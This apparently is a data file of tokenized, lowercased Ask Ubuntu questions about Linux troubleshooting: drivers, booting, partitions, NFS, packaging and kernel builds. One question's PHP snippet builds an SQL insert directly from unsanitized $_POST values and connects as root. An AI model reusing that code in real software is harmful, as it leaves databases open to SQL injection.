435687	sound not working on dell xps m1210	i have a dell xps m1210 , i used to run windows xp home edition and the sound worked perfectly , i could plug-in my headphone and listen to stuff or use its built in speakers . i always have been a big fan of ubuntu so a installed ubuntu in place of windows . now , the sound does n't work , headphones or built-in speakers . i tried having a live chat but my warranty has expired , and there is no way i 'm calling them to get the make and model . so my questions are : is this a motherboard problem or ubuntu 's problem ? can someone provide with a link or something to the drivers ? edit : i have an intel core duo 1.66ghz processor , 2gb of ram at 667mhz , sata i control , i have ubuntu 32-bit 13.10 . yes i tried to adjust the volume . results : $ lspci | grep -i audio : 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) $ lsmod | grep snd : snd_hda_codec_idt 44605 1 snd_hda_intel 42658 3 snd_hda_codec 164003 2 snd_hda_codec_idt , snd_hda_intel snd_hwdep 13272 1 snd_hda_codec snd_pcm 89488 2 snd_hda_codec , snd_hda_intel snd_page_alloc 14230 2 snd_pcm , snd_hda_intel snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_rawmidi 25094 1 snd_seq_midi snd_seq 55383 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14137 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 24447 2 snd_pcm , snd_seq snd 60790 16 snd_hwdep , snd_timer , snd_hda_codec_idt , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi soundcore 12600 1 snd
435688	12.04 radeon hd 4200 crap graphics	i am stuck with 1024x768 . display comes up as a laptop . it 's a philips 17 '' i have no composition , 2d and fuzzy lines going up the screen . i used the software centre to install the ati x.org binary driver . useless ! it loads catalyst . if i click on catalyst control centre , i get : there was a problem initializing catalyst control center linux edition . it could be caused by the following . no amd graphics driver is installed , or the amd driver is not functioning properly . please install the amd driver appropriate for you amd hardware , or configure using aticonfig . there was a problem initializing catalyst control center linux edition . it could be caused by the following . no amd graphics driver is installed , or the amd driver is not functioning properly . please install the amd driver appropriate for you amd hardware , or configure using aticonfig . sudo lshw -c video gives : *-display unclaimed description : vga compatible controller product : rs880 [ radeon hd 4200 ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list configuration : latency=0 resources : memory : e0000000-efffffff ioport:1100 ( size=256 ) memory : f0100000-f010ffff memory : f0000000-f00fffff if i do it in terminal , it says missing dependancies and crashes.. i though i had n't installed it , but : fglrx is already the newest version . fglrx-amdcccle is already the newest version . fglrx-amdcccle set to manually installed doing : sudo aticonfig -- initial aticonfig : no supported adapters detected it 's driving me mad ! i just want my 1280 back and docky not complaining about compositing all the time .
435689	install linux next to window after reserved linux ssd is broken	i have ( or had ) two disks in my laptop : a ssd , where i had ubuntu installed , and a hdd , where 50 % was used for windows 8 and the other half for lvm2 used in linux . however , unfortunately my ssd is broken ( or disconnected , i have to check it ) , but i need to install ubuntu on the same disk as windows 8 . the first 300mb are under system reserved , then there is part for windows and 50 % left where lvm2 partition used to be . i erased it and set up ubuntu on it , but unfortunately on the first boot i get an error like this link to image . after rebooting , i get an error : error : efidisk read error . after booting from usb and checking out the partitions , i get a surprising result like this . the right hand side of the disk should be only for linux , but somehow there is somekind of partition on it ( ? ? ) .
435694	can i dd a larger drive to a smaller one ?	i have resized the partition of the larger drive with gparted . can i do sudo dd if=/dev/largerdrive of=/dev/smalldrive ?
435697	why wont my computer boot ubuntu from my flash drive ?	i have a windows 8 gateway desktop pc and i was wanting to install ubuntu ( 13.10 ) on it . firstly i created a bootable usb using pendrivelinux , the process was successful , and when i plug the flashdrive in using windows 7 and 8 , it is no longer recognized as toshiba 8gb , but install ubuntu ( h : ) , whenever i go into the bios of the gateway pc , i set my removable disk as the first boot priority , and disable secure boot , and launch csm was set to always , and even after all these setting changes i still boot into windows 8 . i did notice that the motherboard in the gateway pc was an exclusive motherboard , i do n't know if that means anything but it is very frustrating and i would like some help to resolve this issue . thanks in advance , gage
435698	adding white space to a shutter screen shot	i have a taken a screenshot with shutter , and i wish to annotate the screenshot , so i click on edit . how do i add white space around the screenshot to put my annotations ?
435700	configuring multiple video cards in ubuntu	i 'm having problems trying to get ubuntu to recognize 6 msi r9 270 cards . i 'm trying to get cgminer 3.7.2 to recognize all cards but it only recognizes one . my system : ga990-fxa ud3 motherboard 4gb of ddr3 ram amd sempron 145 cpu thermaltake 1275w ps ( 6 ) msi r9 270 video cards . ubuntu 13.10 os with amd catalyst 14.2 drivers
435702	imac wo n't boot ubuntu	i have an imac and i installed ubuntu because lion was crap and was causing my computer problems . but i still wanted a mac os so i brought it in to the genius bar at apple and they plugged it in and said they could dual boot the two operating systems ( ubuntu and mountain lion ) , but needed me to backup my files on ubuntu and overwrite with os x then reinstall ubuntu . i brought it home to do the file backup and it wo n't turn on . i called apple and they said bring it back in , but they do n't know how it works and ca n't figure it out . all i 'm getting is a white screen and there is a bootable iso on a cd in the drive that might be causing the problem , but i ca n't get it out . finally i got the cd out by pressing f12 on startup , but it still wo n't turn on . now i 'm getting a flashing icon of a folder with a question mark on it . i really do n't want to lose my files on ubuntu . i have month 's worth of projects that i really want to keep .
435707	gtk setup project	i 'm use to msvs 2010 . i would like to know the gtk equivalent steps to : create a setup project , compile it and then install the program . i have already compiled a program to a .exe file .
435709	tab completion wo n't work on some pdf viewers	i have a directory filled with pdf files , all with long descriptive names . so i rely heavily on tab completion when opening any one of them . however , tab completion only works for zathura , and not for either evince or okular . it does work for evince-previewer , though . how can i fix this up so that tab completion works for all viewers ? ( fwiw : bash shell in 12.04lts . )
435710	install ubuntu on windows 8 on second hard drive without affecting setup	harddrives : 125 gb ssd with windows 8 installed , 1 tb hdd what i want to do : i want to install ubuntu on my hdd without affecting my current set up too much . right now windows 8 boots up nice and fast and i do n't want to have to choose which operating system i want to use all the time . is there a way to download ubuntu onto my hdd and launching it from windows when i want to use it ? thanks
435712	unable to generate .deb file using make deb-pkg ?	i am trying to build my linux source tree . i used following steps : sudo make clean sudo make localmodconfig sudo make menuconfig sudo make deb-pkg but after completion i was not able to see any .deb package generated . i checked the parent directory also , but no luck . edit : actually i checked the build log and it is happening because of the following error /home/rahul/linuxcode/linux/scripts/package/builddeb : line 65 : dpkg-gencontrol : command not found make [ 1 ] : *** [ deb-pkg ] error 127 make : *** [ deb-pkg ] error 2 but i am not able to find the reason , i installed the dpkg-control package also , but the error persists .
435715	ubuntu 13.10 saucy false low battery warning	when i unplug my charger from the computer , about 80 % of the time , i get a low battery warning saying my computer is about to suspend ( when i 'm fully charged with a brand new battery . clearly the easy fix is to just pull it out and put it back in a bunch of times until it works , but that 's fairly inconvenient . i actually get great battery life once it works once . when i check my battery stats , turns out the calculation is right but the system is reading the battery wrong . it claims the size of the battery is 4.6 wh ( it 's actually 48 wh ) . when i use powerstat it 's saying i 'm using between 1-2 w ( clearly wrong ) . while this actually works out fine most of the time since it seems to be scaling right and it even calculates a pretty accurate time remaining , i think it might occasionally read the proper power usage ( somewhere between 10-25 w according to the previous windows installation on this computer ) and calculate 4.6wh/25w and say that the battery is about to die . i 'm not sure why it sometimes works and sometimes does n't though . i understand that versions of this question have been asked and answered before but i thought it worth re-asking for a few reasons . most of the questions are for older versions of ubuntu and a lot of the fixes are no longer valid ( i.e . jupiter apparently does n't work with 13.10 ) . also , this is definitely a software bug as it worked fine in windows . i 'd like to be able to isolate and replicate the problem to help out the community and not just work around it like previous solutions suggest . if anyone has any suggestions about where to start , i 'm reasonably proficient mucking around in the os and willing to try to fix this and file a bug . technical details : my laptop is toshiba l755-s5355 . running ubuntu gnome 13.10 fully updated ( gnome 3.8.4 ) . battery is a brand new but the issue was happening with the old one . just got a new one because the capacity had faded as well . i have gnome-power-statistics installed but the problem was present with and without it . edit : instead of freaking out and plugging it back in when it tells me low battery , i checked the power stats . when i 'm charging it says that i 'm using 65.2w . when it says low battery , it continues to say i 'm using 65.2w . when it lets me use the battery it says i 'm using 1w or so . 65w seems awfully high even while charging .
435723	how to recover from an interrupted distribution upgrade and broken amd driver install ?	i seem to have broken my system hard . it started with me wanting some compiz effects . i have a dell inspiron 14z with a amd radeon hd 7570m card . the card showed up in the output of lspci but not in ubuntu 's system details . i had earlier installed drivers for my card about a year ago from amd 's website which had solved this problem then . however , it seemed to have reappeared . expecting better support from a newer ubuntu version , i decided to do a sudo do-release-upgrade but canceled it midway with ctrl-c because the upgrade was taking very long due to internet problems . i think that is where the real problem starts . because of the unfinished upgrade , my repositories were in a state of flux . not realizing , i proceeded to install drivers following the instructions here . i then realized that i was following the page for the wrong distribution so i cleaned up the software repository list through synaptic and switched over to this guide . i encountered problems with some packages being newer than others and managed to downgrade some using aptitude . for example , i ended up with different versions of libgl1-mesa-dri and libgl1-mesa-glx but the install went through so i figured everything is okay . since the restart , i have been encountering the `` system is running in low graphics-mode '' error . i have spent the past two hours trying all the fixes suggested here but to no avail . finally , sudo apt-get install fglrx errors out pointing to /etc/ati/fglrx-uninstall.log which reports that certain files are `` missing from system '' : /usr/share/ati/lib64/libqtcore.so.4 , /usr/share/ati/lib64/libqtgui.so.4 , /usr/lib/fglrx/switchlibgl , /usr/lib/fglrx/switchlibglx , and others . how do i recover from this so as to boot normally into ubuntu ?
435725	ca n't adjust screen brightness on lenova y410p	ca n't adjust screen brightness on lenova y410p . i 'm running unbutu 13.10 . i tried different answers on here but nothing seems to work . i changed grub_cmdline_linux in /etc/default/grub to include acpi_backlight=vendor one think different then other people have said is i do n't have /sys/class/backlight/intel_backlight ls /sys/class/backlight ideapad thinkpad-screen i 've tried changing the value ideapad/brightness and thinkpad-screen/brightness
435726	ubuntu 13.10 nfs mounted shares keep losing permissions	i have a synology nas box on which i keep my videos . this folder is shared out using nfs . one machine of mine , running ubuntu 13.10 has been having problems accessing this shared folder . none of the other machines in the network ( including other 13.10 machines ) are having any problems . last night i did a wipe and load of the problem-proned machine , set up the shares then watched a movie . it all worked well . then tonight it 's back to the same errors as before . i try to open the share in nautilus and i get the error `` this location could not be displayed . you do not have the permissions necessary to view the contents of `` ( name of share ) '' absolutely nothing has been changed since it was all working right last night ! if i go to the terminal and try to do a directory listing , i get `` ls : can not access ( share name ) : permission denied . showmount -e ( ip address ) shows the correct share in the list . the fstab command is as : 10.42.1.95 : /volume1/video /home/ ( user ) /videosharename nfs rw , hard , intr , nolock 0 0 this fstab statement has always worked with the synology shares ( at least , since ubuntu 13.04 ) . i 've done a wipe and load three times now trying to clean out any possible bugs , but i 'm starting to doubt it 's the configuration since it works fine , then mysteriously dies on me . after each wipe and load i install and configure samba and nfs : sudo apt-get install samba samba-common sudo apt-get install python-glade2 sudo apt-get install system-config-samba sudo apt-get install nfs-common i 'm really not sure what else to check ! any help would be appreciated . -- - edit : found the problem , although i still have a hard time believing it : i replaced the nic card and everything has worked since .
435727	how to launch program on lock and close it on unlock	have siblings who like to `` play '' with my laptop by waking it from suspension and then typing random keys on the keyboard into the password field . afterwards , they always deny it . i plan to install motion and only have it run while the computer is locked . after the computer is unlocked , the process should be killed . how would i go about launching motion when ctrl + alt + l is pressed and kill motion when the correct password is entered ?
435728	installing ubuntu 13.10 error	i installed wubi a little while ago to try out ubuntu and i really like it so i decided to make a partition and install 13.10 fully . when i booted from my usb with 13.10 and tried installing it using the recommended settings it said that there was an error regarding either my cd disk ( i do n't have one ) or my hard disk . i was unaware of any issues to my hard drive . i think it started to install and make the partition because i now how a second partition with some files in it that looks like they would belong to 13.10 but it does not show up as a boot option . any help would be appreciated . edit : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd84789a3 device boot start end blocks id system /dev/sda1 * 2048 2463743 1230848 7 hpfs/ntfs/exfat /dev/sda2 2464560 474346923 235941182 7 hpfs/ntfs/exfat /dev/sda3 474347518 625141759 75397121 5 extended /dev/sda5 474347520 617172991 71412736 83 linux /dev/sda6 617175040 625141759 3983360 82 linux swap / solaris dcolligan @ ubuntu : ~ $ df -h filesystem size used avail use % mounted on /dev/loop0 29g 20g 9.1g 68 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 751m 936k 750m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 240k 1.9g 1 % /run/shm /dev/sda2 226g 157g 69g 70 % /host /dev/sda5 67g 104m 64g 1 % /media/eee7c5a6-3f76-4c20-a374-7217a090a674 /dev/sda1 1.2g 659m 544m 55 % /media/system_drv
435729	boot fail 12.04 on 3.5.0-47 [ solved ]	after updating ubuntu 12.04 lts on my lenovo w530 about two weeks ago , i have encountered numerous booting errors . my most recent ( and default ) version is 3.5.0-47 generic . the screen goes to scrolling text and then locks up . sometimes it goes through to the ui login page and freezes ( although cursor can still be moved ) . other times it goes to a black screen with the cursor . logging in via older versions of linux seems to work sporadically . sometimes a 3.6 version will allow me to login , other times it wo n't ( goes to the same scrolling text and locking up as described above ) . the same can be said for all other older versions that are listed . in another askubuntu post , the problem seemed to stem from wlan0 settings . according to the post once it is disabled , the system is able to boot again , although this would mean that wireless internet would be disabled . 12.04 lts - recent update : fails to boot with version 3.8.0-37 generic unfortunately i do not have the option of connecting my machine to the internet via cable - it relies solely on wifi internet . another problem i have encountered since installing ubuntu on my machine ( over a year ago ) is that my wifi connection is erratic and sometimes simply can not connect to the router . my windows partition has no such problems . at first i thought that there would not be a relationship between my 12.04 wifi problems and this new booting error , however the aforementioned post 's solution of disabling wlan0 has made me think otherwise . i am not a tech savvy linux user . happy to provide more information if i can get instructions on how to provide relevant details . ps i have not been able to set up static ip for my w530 . setting up a static ip resolved wifi issues i was having with my nexus 7 tablet with the current router .
435731	install ubuntu server from centos kickstart	i am trying to install ubuntu 13.10 server 64 bit through my kickstart centos 6.4 server ( which is working perfectly for rhel/centos ) . please find my pxe file here . kernel distros/ubuntu-installer/amd64/linux append initrd=distros/ubuntu-installer/amd64/initrd.gz ks=http : //192.168.1.100/kickstart/kscfg/ks_ubuntu_desktop_13.10_64.cfg ksdevice=eth0 i did follow the instructions given in this post , but the solution did not worked for me , still i am facing the same error .
435734	panel status icons wrong color	across the top of the panel , i have these status indicators : language , network connection , messaging , volume , time , and system . upon format and fresh install of 13.10 , i see that language icon does not change from white to dark grey when switching themes from ambiance to radiance . but whatever , i installed unity tweak tool and a custom icon theme ( flattr ) and window theme ( nitrux ) . now all my status indicators -except time and language- are stuck as grey , even though niturx is a 'dark ' theme . they are hardly visible . and language is still always stuck as white . white .svg files exist for the indicator icons , and they appear when the launcher is called . what 's up with the language indicator icon ? the problem existed before any applications/files were added . what 's up with my icons not changing color ? the theme obviously supports it , it 's just not happening .
435735	backport + mac80211 + trace-cmd	i compiled the backport mac80211 driver . running trace-cmd -e mac80211 , for there is no tracing found for mac80211 . what 's wrong ? mac80211_tracing has turned on in backport compilation .
435736	how to take screenshot of shutter 's menu ?	with the application famously known as shutter , one can take screenshot of about every gui element : like windows , hidden windows , menus , cursor tip etc . the only thing shutter ca n't take screenshot of is itself . using the default screenshot app , we can take screenshot of shutter.but i need to take screenshot of a shutter 's menu , which is not possible ( as it seems to me ) by either using shutter or screenshot . so is there a way i can achieve this ?
435738	how to launch ubuntu without bluetooth enabled ?	bluetooth starts automatically when ubuntu starts . i would like to disable this to save battery power ( because i just forget to turn it off sometimes ) . i know other have indicated that the answer is somewhere in here : how to enable or disable services ? however , i do not understand how to use this solution with bluetooth specifically . i need help with that . can you please provide specific instructions for disabling bluetooth service at startup ? note : bluetooth does not show up in start-up applications gui method .
435741	saucy salamander huge error	i recently installed ubuntu 13.10 . all i have to say is that it lags so much on pc that it makes windows seem 50x faster . just opening up the dashboard and typing in something takes up to 20 seconds . my log in screen is blank with only less than a quarter of the screen showing anything . i think this is due to the fact that ubuntu is not picking up my nvidia drivers i 've been to the additional drivers tab countless times searching for the propriety drivers but i keep getting a error saying no drivers found . i 've used apt-get install nvidia-current but that has just gifted me with the infamous black screen after rebooting heres what happens when i run lspci -nnk | grep -ia3 vga championsonline @ ubuntu : ~ $ lspci -nnk | grep -ia3 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller [ 8086 : a001 ] ( rev 02 ) subsystem : lenovo device [ 17aa:3607 ] kernel driver in use : i915 00:1b.0 audio device [ 0403 ] : intel corporation nm10/ich7 family high definition audio controller [ 8086:27d8 ] ( rev 02 ) 02:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt218m [ geforce 305m ] [ 10de:0a73 ] ( rev a2 ) subsystem : lenovo device [ 17aa:3607 ] kernel driver in use : nouveau 03:00.0 network controller [ 0280 ] : qualcomm atheros ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) my unity support test results championsonline @ ubuntu : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) opengl version string : 2.1 mesa 10.2.0-devel not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no
435743	download android 4.1 source code on ubuntu , have downloaded 15g but it is not finished	i am downloading the source code of android via ubuntu 12.04 . and the manifest file is : < default revision= '' refs/tags/android-4.0.1_r1 '' remote= '' aosp '' sync-j= '' 4 '' / > so i am downloading android 4.0.1 . but the things is i have downloaded 15g , but it is not finished yet . i searched on the internet and it seems that the source code of 4.0 is not that big.. there is something wrong with the school 's internet ( sometimes the internet disconnects ) , so it often stuck and i need to stop it and repo sync again . will this has anything to do with the result ?
435745	having problems with midi in recording on ubuntu	i have a yamaha p-120 model with a usb to midi interface that look like this : now , i 've decided to use lmms because it seems like the easiest midi sequencer available . i 'm having a lot of difficulties getting this to work . what i am trying to do record input from my keyboard onto lmms what is working i can get my output to work . so i can control my keyboard via my computer . what is not working my computer is n't reading the input from the keyboard . i ca n't record any songs . what have i tried a lot . ports/any other information port client name port name 14:0 midi through midi through port-0 24:0 usb midi usb midi midi 1 128:1 lmms default preset 128:2 lmms default preset 128:4 lmms default preset 129:0 client-129 qjackctl let me know if you need anything else to help . i am really trying hard to fix this problem as i would love to use my midi keyboard .
435746	unable to send data to mysql database . it is not taking by my php code	i am new to php in ubuntu 13.10 . but i am pretty much able to handle ubuntu . however my question is that i ca n't add any data to phpmyadmin through a php code , though my code is perfect . because i have the same code in wamp server , and it worked perfectly . but in ubuntu i just ca n't add any data to the database . below seen is the the code of php file ; < ? php $ db_name= '' mydb '' ; $ table_name= '' student '' ; $ con= @ mysql_connect ( `` localhost '' , root ) ; $ db= @ mysql_select_db ( $ db_name , $ con ) ; $ sql= '' insert into $ table_name ( name , course , mobile , address ) '' . `` values ( ' $ _post [ n1 ] ' , ' $ _post [ n2 ] ' , $ _post [ n3 ] , ' $ _post [ n4 ] ' ) '' ; $ r= @ mysql_query ( $ sql , $ con ) ; echo `` -- -- insert successfull -- -- , < br > < br > < hr/ > '' ; echo `` < a href=index.html > back < /a > '' ; ? > please tell me whether i am wrong or is there is any bug/problem in phpmyadmin .
435747	updating packages when network access to standard repositories is blocked	my college just blocked ubuntu repositories . so is there any way to install texlive package from something like zip ? i need to run this command , sudo apt-get install texlive texlive-pdf texlive-latex-extra texlive-generic-extra texlive-generic-recommended so can anyone provide an alternate way to do the same .
435749	ca n't start an application as service , but running as standalone process simply works	for a service although a pid file exists but still on attempt to start service , it fails saying $ sudo service cassandra start * could not access pidfile for cassandra i verified folder permissions under /var/run ( whose owner is root ) & the subfolder cassandra is owned by cassandra user but still service can not access pid file but i verified pid file exists . ( also pid is allocated ) ..so why does it say it ca n't access pid file ? and running cassandra as a standalone process just works.. but not just using service cassandra start $ sudo ls -l /var/run/cassandra total 4 -rw-r -- r -- 1 cassandra cassandra 4 mar 18 07:33 cassandra.pid $ sudo su # ls -ld /var/run/cassandra dr -- r -- -- - 2 cassandra cassandra 60 mar 18 07:38 /var/run/cassandra how do i make this work using sudo service cassandra start ?
435751	can i install ubuntu 13.04 on ibm thinkpad a31	i have an ibm thinkpad and want to install ubuntu . these are my specs : 512mb ram ati mobility radeon 7000 graphics card i do n't know the rest is it possible to install ubuntu 13.04 on it ?
435752	mesh network on ubuntu ?	i need to make a mesh network test bid using existing wifi card of laptops on ubuntu . and then run any file sharing or application sharing on that mesh . i tried this tutorial but failed to paste the olsrd.config file to /etc folder ! if there is any better way to make a mesh between 3-5 laptops , kindly help me out . fleur @ ubuntu : ~ $ ifconfig wlan0 wlan0 link encap : ethernet hwaddr 74 : de:2b:74 : d0:29 inet addr:10.0.0.1 bcast:10.255.255.255 mask:255.0.0.0 inet6 addr : fe80 : :76de:2bff : fe74 : d029/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:314 errors:0 dropped:0 overruns:0 frame:0 tx packets:330 errors:0 dropped:0 overruns:0 collisions:0 txqueuelen:1000 rx bytes:57824 ( 57.8 kb ) tx bytes:41243 ( 41.2 kb ) fleur @ ubuntu : ~ $ iwconfig wlan0 wlan0 ieee 802.11bgn essid : '' mesh '' mode : ad-hoc frequency:2.457 ghz cell : 8e : fa:05:4e:5e : d3 tx-power=16 dbm retry long limit:7 rts thr=250 b fragment thr=256 b power management : on fleur @ ubuntu : ~ $ sudo olsrd -d 2 *** olsr.org - 0.6.3-git_-hash_cfd7c48ab5a78db3e70cfdece616addb - *** build date : 2013-04-06 06:14:10 on batsu http : //www.olsr.org parsing file : `` /etc/olsrd/olsrd.conf '' debug level : 0 ipv4 broadcast : 255.255.255.255 hello interval : 6.00 hello validity : 600.00 tc interval : 0.50 tc validity : 300.00 mid interval : 10.00 mid validity : 300.00 hna interval : 10.00 hna validity : 300.00 interface defaultslink quality fish eye 1 ipversion : 4 clear screen enabled noint set to 1 willingness : 3 ipc host : 127.0.0.1 hysteresis disabled link quality level 2 pollrate 0.10 tc redundancy 2 mpr coverage 5 no interfaces configured ! bad configuration ! olsr exit : main
435756	can not find classmap.h	when i execute : make modules i get the error : make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : nothing to be done for `relocs ' . chk include/generated/uapi/linux/version.h chk include/generated/utsrelease.h hostcc scripts/selinux/genheaders/genheaders scripts/selinux/genheaders/genheaders.c:13:22 : fatal error : classmap.h : no such file or directory compilation terminated . make [ 3 ] : *** [ scripts/selinux/genheaders/genheaders ] error 1 make [ 2 ] : *** [ scripts/selinux/genheaders ] error 2 make [ 1 ] : *** [ scripts/selinux ] error 2 make : *** [ scripts ] error 2
435757	`` read error '' when booting on ubuntu 12.04	yesterday i got this read error message : i was very confused about this . my pc was off ten days before i turned it on . can someone tell me how to fix this ?
435760	ubuntu 13.10 only for 9 months ?	wont i be able to use my ubuntu 13.10 after 9 months ? ? because it is mentioned that it will be supported only for 9 months . it is the only version that worked correctly in my hp probbok 4445s .
435764	ca n't view pictures from samsung s3	i am new to ubuntu . i have installed ubuntu 12.04 . i plugged in my samsung s3 into the laptop to see the files and the pictures ; however , i ca n't view the pictures jpg . please help me to view the pictures
435766	dependency is not satisfiable error	i am a new user to ubuntu and seeking for help on installing a mod for nautilus . i am running 12.04 on 32 bit machine . i do not know hot to compile all these files or what i am doing wrong . i downloaded the top file and got the following message when opening the file : dependency is not satisfiable ideas on how to proceed ?
435768	how does the grub bootloader know ?	i am not understanding how it comes to know which kernel image to load ? i have so many . once i had created my own kernel and recompiled . how does it come to know that this is the one to load ?
435773	how to set priviledge on port 21 ftp of a host	i have a linux hosting working with cakephp.some sites got intrusion/hacked.i used nmap to see the open ports . i found 21/tcp open ftp is the port which should be restricted and not accessible via public . also i am thinking to restrict /app/config from 777 to 755 and also change databse.php file 'login ' = > 'root ' , to user . can i restrict ftp port 21 to set priviledge if yes , what effect it will have . how to set priviledge on ftp port 21 of a host . other ideas regarding security is also welcomed .
435779	i dont want to restart ffserver after adding few texts to ffserver.conf and saving it ... is there any solution ?	whenever i add few lines to ffserver.conf file i need to restart ffserver in order for ffserver to work again ( as ffserver need ffserver.conf file ) . if i dont restart ffserver , i get input/output error when i give ffmpeg command . please give me a solution to automatically restart the server when i change ffserver.conf file . or is there any other way to solve this problem . p.s : this post might be inappropriate for this blog but if any of you know the answer please let me know the solution . thank you
435782	how to install sailfin on ubuntu	i want to install sailfin on ubuntu for my project . can anyone help me to do that ?
435783	how to have different screen dimming profiles for ac & battery ( 13.10 )	this has been asked before but not yet answered : i 'm looking for a way to have a different timeout for screenlock & dimming depending on whether i am on ac or battery power . currently the only workaround i see is to use a long timeout ( say 30 mins ) in `` bightness and lock '' and then override that by using the `` power '' settings to suspend ( say after 10 mins ) when on battery . this works , except that i 'd rather not have a full suspend , just a screen dim , so that it comes back up right away . thank you . ( hp with intel sandybridge mobile display hardware )
435785	get current hard disk read write in ubuntu and make log file	i 'm writing a customized monitoring panel for ubuntu server . at this step i need to get real time hard disk read and write rate then put it into a file as a log file . i used tools like hdparm , iotop but they did not work . i want the result in a file . i want a result such as : 10kb read - 2kb write - 2014-2-13 16:40:03 so i can run it as crontab and monitor every i/o rate .
435786	owncloud -problem installing packages	i have just installed these packages for building my owncloud , but always get an installation aborted error : rqie @ rqie-virtualbox : ~ $ sudo apt-get install apache2 php5 php5-json php5-gd php5-sqlite curl libcurl3 libcurl3-dev php5-curl php5-common php-xml-parser reading package lists ... done building dependency tree reading state information ... done note , selecting 'php5-common ' instead of 'php5-json' note , selecting 'libcurl4-openssl-dev ' instead of 'libcurl3-dev' php-xml-parser is already the newest version . apache2 is already the newest version . curl is already the newest version . libcurl3 is already the newest version . libcurl4-openssl-dev is already the newest version . php5 is already the newest version . php5-common is already the newest version . php5-curl is already the newest version . php5-gd is already the newest version . php5-sqlite is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 16 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up qmail ( 1.06-4 ) ... the hostname -f command returned : $ 1 your system needs to have a fully qualified domain name ( fqdn ) in order to install the var-qmail packages . installation aborted . dpkg : error processing qmail ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of qmail-run : qmail-run depends on qmail ( > = 1.06-2.1 ) ; however : package qmail is not configured yet . dpkg : error processing qmail-run ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : qmail qmail-run e : sub-process /usr/bin/dpkg returned an error code ( 1 ) anyone can help me ? thanks advanced
435789	how to re-enable opengl	i was trying to speed up my tiny laptop by switching off opengl using compiz . i guess there were also whole bunch of related plugins got disabled in the process . then i lost the entire gui desktop interface . could someone please tell me how to get everything back through command line ? thanks .
435802	okular & rekonq printing black pages	i found a strange bug printing from kubuntu lsb_release -a distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy in okular okular -v qt : 4.8.4 kde development platform : 4.11.2 okular : 0.17.2 in my web browser rekonq -v qt : 4.8.4 kde development platform : 4.11.2 rekonq : 2.3.2 with printer lpstat -p -d printer hewlett-packard_hp_laserjet_400_m401dw is idle . enabled since tue 18 mar 2014 10:37:05 eet waiting for job to complete . system default destination : hewlett-packard_hp_laserjet_400_m401dw i can print test pages and print from other applications without problems , but printing from pdf documents from okular within my web browser results in a single , fully black page coming out of the printer . in the past , i was able to print from okular , i 'm not sure what has changed with my system since then ( i did install acroread , but could that have affected okular ? ) . this is a very annoying bug that could waste lots of print toner . does anyone have any idea what is going on ? from okular and acroread , printing to a pdf file or ps file both result in a normal file . within a rekonq web browser , however , opening a pdf file with okular withing reknoq , printing to a pdf file or a ps file results in the black page .
435806	how to create a new category in the gnome menu ?	i want to create a custom category menu . how can i do that ? for example , i want to create a category menu named `` halogen '' like accessories , games , graphics , internet..etc
435807	lxrandr error when ( un- ) installing software	i got this error when installing transmission and uninstalling some unused dependencies in lxde : /usr/share/menu/lxrandr : missing required tag : `` section '' skipping file because of errors ... is this bad ?
435808	clicking on `` shut down '' system is displaying `` lock '' and `` log out '' button	my os is ubuntu 13.10 ( 32 bit ) problem description : clicking on shut down from the ubuntu top panel , system is displaying lock and log out button . even both the buttons ( i.e . lock and log out ) are not working . previously for the same action , system was displaying restart and shut down button . i want to get the previous buttons back on clicking on shut down from the ubuntu top panel . please help .
435812	how to download torrents in ubuntu 13.10	every time i click on `` get this torrent '' , i get a window asking to choose a application : i have qbittorrent installed but i do n't know how do i select it from this windows which open when i click on `` choose '' from the previous window .
435815	usb log history overwritten	i need to know how some files have been saved in my computer 7 months ago . i know that they have been copied from a usb peripheral and i know the exact date and time they were saved , i want to discover the model or some information about that usb key . i know that ubuntu archives logs , unfortunately older logs archives are maximum 6 months older and i ca n't find any older log . ( i checked kern.log.gz and syslog.gz ) could you suggest a different way to check model or brand of the usb key from were files where copied ? system is lubuntu ( very similar to ubuntu )
435819	total newbie wants to know - ubuntu tweak - changing the computer name	i have installed ubuntu on an old pc to try and learn it and become familiar so i can switch away from windows , although most probably not entirely . i 've put my machine on a network and would like to change its name . someone in a reply to this same question by another forum member suggested the following : if you want a gui assisted process install ubuntu-tweak . among other uses of this app is the ability to change computer name through tab `` computer-details '' - > `` hostname '' i have downloaded and installed the latest version of ubuntu-tweak , however i do not see a tab named as suggested above . what am i doing wrong ? what am i missing ? the reason i started on a new question is that this reply was over 4 years old or thereabouts . thank you for your answers and consideration .
